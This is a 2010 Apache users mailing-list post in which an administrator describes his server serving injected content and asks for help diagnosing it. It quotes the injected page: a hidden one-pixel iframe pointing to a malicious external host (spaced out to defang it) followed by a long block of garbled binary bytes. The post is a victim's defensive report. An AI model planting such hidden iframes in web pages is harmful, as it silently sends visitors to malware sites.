httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Oleg Goryunov <oleg.goryu...@gmail.com>
Subject [users@httpd] Someone hacked my apache2 server
Date Sat, 03 Apr 2010 21:20:21 GMT
Hello all,
It looks like someone hacked my apache2 server and I am trying to understand
how this could have happened.
This is what happened:
All of a sudden the server - in response to a web-browser request for a page
- started to give a full screen of unknown characters (looked like a long
text with encoding mismatch).
The output was immediate and the same for all the web-sites located on the
server.
Looking at the page source of the output I see the following:
=========

<iframe src=  http://a z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html
width=1 height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц
'█&q ┤I щ]╙ф╥l{√ла$┌
fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь  З╩Ё√Уєул▀.^СЙM ╣°їхЫ╫╟$шДсЗ┴q
Ю\ЭР Ю^Э╜
!¤nП\i*

╖\I*┬Ё╒█А  k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6      ОЖО▀M*д9lAщяээ
ГГгн√╙"╤╛аr| 0┘G
й=  г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
MЮeJ█n  ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦
╦ни╩ўю╫ЛЛє╦л JЪ█Й╥ ╥I
╩%7░К █o

HШЙ5╧p}+г
I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟
∙lБ\B:e y  ├т ;
Ч╫▐,B ! ╘2 .═" ╤) ╓]°  ═─a`@Y6╬-┴ЎАа └
ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm
│.&cчВЩ      cАqЧbSy
ь┬SPХ─=├д        R├ пD▌ ЖЕ o

#Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
 \Є╤l№ 4#·
У'C.3┤      аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с  ·~ FZ∙d�0KJ.ю
     bE╔йь╜┼g      ь
8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8 Н3%┴ГCTE кЖx─t╫o
H щ█Ж!- Ф^  A
┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚ ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`
╜╜┴nowў┘(┌┘▐щя$╔^ э ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS  ┼Ё█я
▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i
╖Z@ Yў■ЕY,Р`- FE4Юa. ё Жv0и  Ї ^ЎdTуц┬A╬>t╨╡┘  ЩМ╩г╙є│W
}ё+▓ fUXЗўs  -wвR F░
∙Н╕5▐d ░Ч╛▒


~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█   ╣н┌Г■{ х?ъ  uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m
 ╣Ь*
35ez╩a▒крпх{ь#eч:х>_┴Гъx  1°/л1xQщ╕ ╝вУжEФ,".`н╞г\║нмa
E'YЇоЫ╚▐
.Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║  -д╚Ъ,i╔ТvЭ ¤╡"H
пч¤Ў№° L╖W0Нsc┴ u R%
ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖  YR∙<} █ ю О╕д╥-q
╖_╩╬{2Yхц╕╔ ┴┤щрБ
A+Q╖▄▓Ч°▐{З╗чП

wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа
&28
^╫@O}у:╨f -AпеЪ      ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═
5  1▄ И Яєцц|  ─w▄oя 4
унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
╙v*чї8x~vётэow+v╨\ П ╥dJ!  │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢ r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гG
цы╤▌∙·"O Ч╤ │ї R_√YР.& |  ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
¤

KV$Ч      ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ >
Ж ?>  ы'ci в╫i�
ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~
И;ўL  Oь>Сp╚етА
8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
▄щсМ├

би╝9сй+╬B  A& ╔-ЧnдUX▒uu вF В )Odф
с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш
╪┤L SАД(      мм
&╗Z3NvJ╣p шh╖w┬] ╦
 С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
 *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q      K#К3Fб:╚·1  З ёqо]П█rА
n:▀А╨ Ы╔Е
;Лz╦0╕╩5С╤Д╤R╜      Ыr

┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨   х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q
╒j ╒╢B║
╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н
цмВY ёJф╢ЪЇ╓ ▒╥с╛°
мщЄц╥╗>nG~CH(d"╒ГcЛР夹a  ▓▐  69╖   АoX;wц ыlэ╡s   YИLШ@
  ╗ √C Zь р"°ЄБPcЧ
a)gУeхд4NH┐  /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪      ф5X р 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥
№u╞aМtЄХ^Ё
W?Kў╖2 ймУр╓4Р E

==================
The address indicated in the begining of the page code leads to some chinese
server.


So, somehow it happened that the output of the apache server was substituted
by this page, which redirected visitors to some chinese server. It is the
second time I am posting to the mailing list, the first time the mailing
list virus scanner identified the content as having the Troj/Fujif-Gen
virus, thus, this time I removed active links from the message body so it is
not exactly what I received).

But the most strange thing was that the problem dissapeared itself! So, it
last for 10 minutes then disappeared! And the again started and again
dissapeared. Finally, I turned down apache untill I understand what is going
on...

Any idea how could that happen?  How to reproduce this? How to prevent?
Where to look for logs? I have check both ssh logs and apache logs, there is
nothing that could seem unusual there...

Any help is appreciated.
Oleg.
Mime
View raw message